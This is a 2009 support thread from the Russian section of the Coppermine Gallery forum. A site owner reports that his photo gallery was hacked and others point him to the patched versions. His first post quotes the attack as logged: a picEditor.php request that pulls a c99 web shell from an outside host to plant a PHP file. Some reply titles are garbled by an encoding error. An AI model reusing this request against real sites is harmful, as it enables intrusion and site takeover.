Print Page - Срочно ! Взломали фотогалерею. Привожу при

Title: Срочно ! Взломали фотогалерею. Привожу при
Post by: pansionat on February 02, 2009, 06:40:06 PM

Срочно ! Взломали фотогалерею. К сожалению не очень сильно знаю английский. Но вот привожу лог залива постороних файлов через дырку в скрипте:
мой сайт/picEditor.php?img_dir=http://xakforum.altnet.ru/tmp_upload/files/c99shell.txt&CURRENT_PIC[filename]=/1.php

Надеюсь подправят уязвимость

Title: Re: Ñðî÷íî ! Âçëîìàëè ôîòîãàëåðåþ. Ïðèâîæó ïðèìåð
Post by: MISHA on February 03, 2009, 01:53:13 PM

версия 4.18 ? вроде там была уязвимость

Title: Re: Уязвимость в picEditor.php
Post by: pansionat on February 03, 2009, 04:54:37 PM

У меня версия этого файла 1.4.16
Но дело в том, что я сравнил файлы версий и разница тольв этом
Версия 1.4.16
<? starttable("100%", $lang_editpics_php['crop_title'], 3); ?>

Версия 1.4.19
<?php starttable("100%", $lang_editpics_php['crop_title'],?>

Неужели такое незначительное изменение устраняет проблему ?

Title: Re: Ñðî÷íî ! Âçëîìàëè ôîòîãàëåðåþ. Ïðèâîæó ïðèìåð
Post by: MISHA on February 04, 2009, 01:32:36 AM

я в этом полный ноль, советую обновить.

Title: Re: Срочно ! Взломали фотогалерею. Привожу при
Post by: Makc666 on February 04, 2009, 07:45:31 PM

То, что у Вас сделали, это уязвимость найденная и исправленная в версии 1.4.17
http://forum.coppermine-gallery.net/index.php/topic,51787.0.html

Также была и версия 1.4.19, которая тоже имела дыру:
http://forum.coppermine-gallery.net/index.php/topic,54235.0.html

Хочу обратить внимание, что уже вышла новая версия 1.4.20, где была исправлена серьезная уязвимость версии 1.4.19!

coppermine-gallery.com/forum

Support => Русский (Russian) => Language Specific Support => cpg1.4.x Русский (Russian) => Topic started by: pansionat on February 02, 2009, 06:40:06 PM